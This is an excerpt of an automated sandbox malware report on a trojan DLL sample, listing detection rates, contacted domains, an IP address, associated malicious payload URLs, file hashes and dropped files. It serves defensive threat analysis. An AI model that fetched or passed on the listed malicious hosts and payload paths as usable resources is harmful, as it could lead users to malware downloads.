                • iexplore.exe 39: contacts api10.laptok.at 47.241.19.44, 49732, 49733, 49750, CNNIC-ALIBABA-US-NET-AP AlibabaUSTechnologyCoLtdC, United States

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            onerous.tar.dll | 48% | Virustotal |
            onerous.tar.dll | 58% | ReversingLabs | Win32.Trojan.Razy
            onerous.tar.dll | 100% | Avira | TR/Crypt.XDR.Gen
            onerous.tar.dll | 100% | Joe Sandbox ML |

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            Source | Detection | Scanner | Label
            c56.lepini.at | 12% | Virustotal |
            api10.laptok.at | 12% | Virustotal |

            URLs

            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            c56.lepini.at | 47.241.19.44 | true | true | | unknown
            api10.laptok.at | 47.241.19.44 | true | false | | unknown

            URLs from Memory and Binaries

                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                          high
                                                                          http://www.ask.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                            high
                                                                            http://www.priceminister.com/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                              high
                                                                              https://github.com/Pester/Pesterpowershell.exe, 0000001A.00000002.427712389.000002A5848DE000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://www.cjmall.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                  high
                                                                                  http://search.centrum.cz/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                    high
                                                                                    http://www.carterandcone.comlexplorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://suche.t-online.de/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                      high
                                                                                      http://www.google.it/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                        high
                                                                                        http://search.auction.co.kr/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://www.ceneo.pl/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                          high
                                                                                          http://www.amazon.de/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                            high
                                                                                            http://sads.myspace.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                              high
                                                                                              http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://google.pchome.com.tw/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                high
                                                                                                http://www.rambler.ru/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://uk.search.yahoo.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://espanol.search.yahoo.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://www.ozu.es/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://search.sify.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://openimage.interpark.com/interpark.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://search.ebay.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.gmarket.co.kr/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://search.nifty.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://searchresults.news.com.au/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://www.google.si/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://www.google.cz/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.soso.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.univision.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://search.ebay.it/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.amazon.com/msapplication.xml.3.drfalse
                                                                                                                          high
                                                                                                                          http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.asharqalawsat.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://busca.orange.es/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.twitter.com/msapplication.xml5.3.drfalse
                                                                                                                                  high
                                                                                                                                  http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000021.00000000.412493518.0000000006100000.00000002.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://search.yahoo.co.jpexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.target.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://buscador.terra.es/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.typography.netDexplorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://fontfabrik.comexplorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://search.orange.co.uk/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown

                                                                                                                                      Contacted IPs


                                                                                                                                      Public

IP            Domain   Country        ASN    ASN Name                                          Malicious
47.241.19.44  unknown  United States  45102  CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC  true

                                                                                                                                      Private

                                                                                                                                      IP
                                                                                                                                      192.168.2.1

                                                                                                                                      General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 322295
Start date: 24.11.2020
Start time: 21:18:13
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 36s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: onerous.tar.dll
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 38
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.evad.winDLL@25/54@4/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 5% (good quality ratio 4.7%)
• Quality average: 77.5%
• Quality standard deviation: 28.3%
HCA Information:
• Successful, ratio: 86%
• Number of executed functions: 106
• Number of non-executed functions: 221
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .dll
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe
• Excluded IPs from analysis (whitelisted): 13.88.21.125, 52.255.188.83, 104.108.39.131, 51.104.144.132, 2.18.68.82, 20.54.26.129, 152.199.19.161, 51.103.5.159, 92.122.213.194, 92.122.213.247
• Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, par02p.wns.notify.windows.com.akadns.net, go.microsoft.com, emea1.notify.windows.com.akadns.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, ie9comview.vo.msecnd.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus15.cloudapp.net, cs9.wpc.v0cdn.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time | Type | Description
21:20:19 | API Interceptor | 41x Sleep call for process: powershell.exe modified
21:20:44 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified

Joe Sandbox View / Context

IPs

Match: 47.241.19.44
Associated Sample Name / URL | Detection | Context
0xyZ4rY0opA2.vbs | malicious | c56.lepini.at/jvassets/xI/t64.dat
6Xt3u55v5dAj.vbs | malicious | c56.lepini.at/jvassets/xI/t64.dat
JeSoTz0An7tn.vbs | malicious | c56.lepini.at/jvassets/xI/t64.dat
1qdMIsgkbwxA.vbs | malicious | c56.lepini.at/jvassets/xI/t64.dat
2Q4tLHa5wbO1.vbs | malicious | c56.lepini.at/jvassets/xI/t64.dat
0wDeH3QW0mRu.vbs | malicious | c56.lepini.at/jvassets/xI/t64.dat
0k4Vu1eOEIhU.vbs | malicious | c56.lepini.at/jvassets/xI/t64.dat
earmarkavchd.dll | malicious | c56.lepini.at/jvassets/xI/t64.dat
6znkPyTAVN7V.vbs | malicious | c56.lepini.at/jvassets/xI/t64.dat
a7APrVP2o2vA.vbs | malicious | c56.lepini.at/jvassets/xI/t64.dat
03QKtPTOQpA1.vbs | malicious | c56.lepini.at/jvassets/xI/t64.dat
2200.dll | malicious | c56.lepini.at/jvassets/xI/t64.dat
22.dll | malicious | api10.laptok.at/favicon.ico
mRT14x9OHyME.vbs | malicious | api10.laptok.at/favicon.ico
0RLNavifGxAL.vbs | malicious | c56.lepini.at/jvassets/xI/t64.dat
1ImYNi1n8qsm.vbs | malicious | c56.lepini.at/jvassets/xI/t64.dat
4N9Gt68V5bB5.vbs | malicious | api10.laptok.at/favicon.ico
34UO9lvsKWLW.vbs | malicious | api10.laptok.at/favicon.ico
csye1F5W042k.vbs | malicious | api10.laptok.at/favicon.ico
0cJWsqWE2WRJ.vbs | malicious | api10.laptok.at/favicon.ico

Domains

Match: api10.laptok.at
Associated Sample Name / URL | Detection | Context
0xyZ4rY0opA2.vbs | malicious | 47.241.19.44
6Xt3u55v5dAj.vbs | malicious | 47.241.19.44
JeSoTz0An7tn.vbs | malicious | 47.241.19.44
1qdMIsgkbwxA.vbs | malicious | 47.241.19.44
2Q4tLHa5wbO1.vbs | malicious | 47.241.19.44
0wDeH3QW0mRu.vbs | malicious | 47.241.19.44
0k4Vu1eOEIhU.vbs | malicious | 47.241.19.44
earmarkavchd.dll | malicious | 47.241.19.44
6znkPyTAVN7V.vbs | malicious | 47.241.19.44
a7APrVP2o2vA.vbs | malicious | 47.241.19.44
03QKtPTOQpA1.vbs | malicious | 47.241.19.44
2200.dll | malicious | 47.241.19.44
22.dll | malicious | 47.241.19.44
mRT14x9OHyME.vbs | malicious | 47.241.19.44
0RLNavifGxAL.vbs | malicious | 47.241.19.44
1ImYNi1n8qsm.vbs | malicious | 47.241.19.44
4N9Gt68V5bB5.vbs | malicious | 47.241.19.44
34UO9lvsKWLW.vbs | malicious | 47.241.19.44
csye1F5W042k.vbs | malicious | 47.241.19.44
0cJWsqWE2WRJ.vbs | malicious | 47.241.19.44

Match: c56.lepini.at
Associated Sample Name / URL | Detection | Context
0xyZ4rY0opA2.vbs | malicious | 47.241.19.44
6Xt3u55v5dAj.vbs | malicious | 47.241.19.44
JeSoTz0An7tn.vbs | malicious | 47.241.19.44
1qdMIsgkbwxA.vbs | malicious | 47.241.19.44
2Q4tLHa5wbO1.vbs | malicious | 47.241.19.44
0wDeH3QW0mRu.vbs | malicious | 47.241.19.44
0k4Vu1eOEIhU.vbs | malicious | 47.241.19.44
earmarkavchd.dll | malicious | 47.241.19.44
6znkPyTAVN7V.vbs | malicious | 47.241.19.44
a7APrVP2o2vA.vbs | malicious | 47.241.19.44
03QKtPTOQpA1.vbs | malicious | 47.241.19.44
2200.dll | malicious | 47.241.19.44
0RLNavifGxAL.vbs | malicious | 47.241.19.44
1ImYNi1n8qsm.vbs | malicious | 47.241.19.44
http://c56.lepini.at | malicious | 47.241.19.44

ASN

Match: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Associated Sample Name / URL | Detection | Context
0xyZ4rY0opA2.vbs | malicious | 47.241.19.44
6Xt3u55v5dAj.vbs | malicious | 47.241.19.44
http://qaht.midlidl.com/index | malicious | 8.208.98.199
https://bit.ly/3nLKwPu | malicious | 8.208.98.199
Response_to_Motion_to_Vacate.doc | malicious | 47.254.169.80
https://bit.ly/2UR10cF | malicious | 8.208.98.199
JeSoTz0An7tn.vbs | malicious | 47.241.19.44
1qdMIsgkbwxA.vbs | malicious | 47.241.19.44
https://bit.ly/3lYk4Bx | malicious | 8.208.98.199
2Q4tLHa5wbO1.vbs | malicious | 47.241.19.44
https://bouncy-alpine-yam.glitch.me/#j.dutheil@dagimport.com | malicious | 47.254.218.25
0wDeH3QW0mRu.vbs | malicious | 47.241.19.44
0k4Vu1eOEIhU.vbs | malicious | 47.241.19.44
https://bit.ly/35MTO80 | malicious | 8.208.98.199
videorepair_setup_full6715.exe | malicious | 47.91.67.36
http://banchio.com/common/imgbrowser/update/index.php | malicious | 47.241.0.4
earmarkavchd.dll | malicious | 47.241.19.44
6znkPyTAVN7V.vbs | malicious | 47.241.19.44
a7APrVP2o2vA.vbs | malicious | 47.241.19.44
03QKtPTOQpA1.vbs | malicious | 47.241.19.44

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{C152A98E-2EDD-11EB-90E4-ECF4BB862DED}.dat
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Category: dropped
Size (bytes): 29272
Entropy (8bit): 1.7738811488176964
Encrypted: false
SSDEEP: 96:rHZMZ928cx9W8pLdt8pDpf8phANM8pGf827B:rHZMZ928cx9W8vt8Fpf8vANM8Yf8YB
MD5: A3C986346E381979C8B7FF0E295E4A1C
SHA1: E0C81809FAB44BA2F42D1BD0385210480A21747D
SHA-256: F5360641C2C41DF8CB888BEA48789AACE3A6E0EB5E17AE74431EE61EE4121098
SHA-512: 7CAA977208364696DA94E56DED347DE330491EC529F0E41AF9717C431ED2EDB832268693761B9CEB2C91E7A30A377FF10891B87F4CB74209515935BB56D1BA4C
Malicious: false
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{DC6A3E1D-2EDD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):71272
                                                                                                                                      Entropy (8bit):2.0467308111060736
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:rlZyZI299WRZtDfO1Mh3GtesD+tt6KmseKkSVOSGOCSmsiBhVtiv1mw1VrizY1hU:rruf9URLjzFGHaROKiDiRizpMzg
                                                                                                                                      MD5:27CB7067349AD628F3167C98BE8BA56E
                                                                                                                                      SHA1:67A8CBE516489D9A23666BB973040CA03FAD967C
                                                                                                                                      SHA-256:523D34792AB0EA3E62C208306C40EB049E011004AB7ACE7044119938002D4940
                                                                                                                                      SHA-512:E3DC29904BAB3F2D70906DD20D4BB327B9889933609224910B8083464A5F28A1E3B591F9E87EF78A9FDC7733D887598C7DB8D49B7438567C413B62E648A89736
                                                                                                                                      Malicious:false
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{C152A990-2EDD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):27592
                                                                                                                                      Entropy (8bit):1.9191146948002127
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:rrZBiQkz623kIFj52skWOMuYBvqtlvqLgA:r9J3bIhIYnuIvWvA
                                                                                                                                      MD5:C0D309DF982E079C8D13B71F3742CDE8
                                                                                                                                      SHA1:3C0C8B011F7D3A9FA4A918993249212EE98A2423
                                                                                                                                      SHA-256:FB865E3D5572506172E428FF5C8181FEB5F7E5F691E4D34E9039FE0679C389C7
                                                                                                                                      SHA-512:4640038DD51D3FA19EDD5B646B28F46347FCB0812FB581850045D7EF4D362072CB8979925BAEED373A28C87FE5049CFA8426D043312BB7F4BD9C1704FA81B3A1
                                                                                                                                      Malicious:false
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DC6A3E1F-2EDD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):27600
                                                                                                                                      Entropy (8bit):1.9187028135850674
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:rJZeQe6gkAFj520kWhMUY5INbW1I92NbfoA:r/bptAhIg6UwabO5bj
                                                                                                                                      MD5:33231CC9EC2C9C3202D8F3B8BBAC1B9E
                                                                                                                                      SHA1:E6147AEC076FB9CC8BB3B211B31F3FC2D823E670
                                                                                                                                      SHA-256:535C6F8B2D99A2344A1E6103C675F9A4B3A60E6F443B0FA8335887837A347631
                                                                                                                                      SHA-512:B840E17D440272F44B27FA64295E680F912E3EE3D5B6E16C5B39B350CA37C2DBEE9A25ED75E8DEE61C92A437863B6EA5E06C2AC5660D108653B5C32AA0087DE3
                                                                                                                                      Malicious:false
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DC6A3E21-2EDD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):28692
                                                                                                                                      Entropy (8bit):1.9204507076447392
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:rBXZiQHz6NkEFjB2ckWXM+Ylw3DlDNb1E3DlDNJr:rBJPHW2EhwI8+Mw35HE357
                                                                                                                                      MD5:6F4D8329020DDEA4354B398FF20C7AAE
                                                                                                                                      SHA1:5BEF65ED9DD663598B49B2B8F730C056E48333C8
                                                                                                                                      SHA-256:93F57556211625DF04ABAC6D2EA6A1C267D8B02ECA56401612B13FF88D86D342
                                                                                                                                      SHA-512:7A0377926FB4764816F6B09F03C6CA046D1E8B19796DC8B17E8004B49B822B4FBE5EA482C7FF0DDC21D1BC6F5AD4A8A3878662863CCC21E4563910AB6436A4C0
                                                                                                                                      Malicious:false
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E26E6CA8-2EDD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):28140
                                                                                                                                      Entropy (8bit):1.9188053866160313
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:rAZLQH6dkWFjf2ukWVMwYNfYJwlfaYJX14A:rwkaGWhOKWwEgKxt1b
                                                                                                                                      MD5:E5DECC73807B0E0B79C71BACA4C7DB4B
                                                                                                                                      SHA1:DAA38D791EB71D2F9B44C59915522C46816C92BA
                                                                                                                                      SHA-256:0950B5299958686489E3F258393C6AB71E732D7BE3C4FF041592E3BFD52B5694
                                                                                                                                      SHA-512:C5ADB7661E65EA01343BDA5D49D7A77D784FC639D2C1E190989180EA9F03EF41765C181AC894BB613A7542E0AE45DC1883A80988938D7B2A9445749C65E9EDA9
                                                                                                                                      Malicious:false
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):656
                                                                                                                                      Entropy (8bit):5.077401580149026
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNxOE0KdWpKdWX4nWimI002EtM3MHdNMNxOE0KdWpKdWX4nWimI00ObVbkt:2d6NxO+fK4SZHKd6NxO+fK4SZ76b
                                                                                                                                      MD5:1BE4A1F7F451CEEBE27D331E3F75EB62
                                                                                                                                      SHA1:30BD0677580A78C32576AED6973579E27BB3439F
                                                                                                                                      SHA-256:F313CA1F1598B33E2116F6DB66C205BFF45876EB41BBB53653E8C4E063DFF943
                                                                                                                                      SHA-512:E0337672D9644879ED87AA7592333F0F8EC0507587EB955A803FFD331E62F16BC9D671B8BC58B95954807DD1CA558F518A96AB3AF5907E563D83E7C724BE9DBE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x98a8d38c,0x01d6c2ea</date><accdate>0x98a8d38c,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x98a8d38c,0x01d6c2ea</date><accdate>0x98a8d38c,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):653
                                                                                                                                      Entropy (8bit):5.093006023686203
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNxe2ksDlxDlX4nWimI002EtM3MHdNMNxe2ksDlxDlX4nWimI00Obkak6Es:2d6Nxrp4SZHKd6Nxrp4SZ7Aa7b
                                                                                                                                      MD5:8BA10CB684BCA2596B80CDF6672B8AED
                                                                                                                                      SHA1:E18BD4F47888E0B4E89B5A45FF4ED5A87C1C26D5
                                                                                                                                      SHA-256:04065D56E43CD36AA4E36B26061C33D534291B08879915E12D467328A8E06643
                                                                                                                                      SHA-512:E8CE02D03D868CA8DA4B9555F3A336C5484B7D309E17CE9160767753023342ABC799942F058CC2CB07BD37BA07879138B91D6EFBF7A5F7B057880B74B149BB99
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x989ce7de,0x01d6c2ea</date><accdate>0x989ce7de,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x989ce7de,0x01d6c2ea</date><accdate>0x989ce7de,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):662
                                                                                                                                      Entropy (8bit):5.122194032135596
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNxvL02Tp2TX4nWimI002EtM3MHdNMNxvL02Tp2TX4nWimI00ObmZEtMb:2d6NxvQ4SZHKd6NxvQ4SZ7mb
                                                                                                                                      MD5:7CA8697F7CC6EB2AE1AD1DCDEFE99E45
                                                                                                                                      SHA1:FE5A3DC46C2A5F559D395DF4A0E6D6140ED664E6
                                                                                                                                      SHA-256:8ADD093CCA9896A3CCD685494F209190B74DC4E66288CF2A2E2AE0E57D8C76D6
                                                                                                                                      SHA-512:63D1EF3DAC54A8D9D91E02C3DF271287DADD92828DD2BDCC28F52F4E3517F14F50462EDE89419D90D677606179E49F49D14D434AF7DE8DC9802D94F2CAADBB7A
                                                                                                                                      Malicious:false
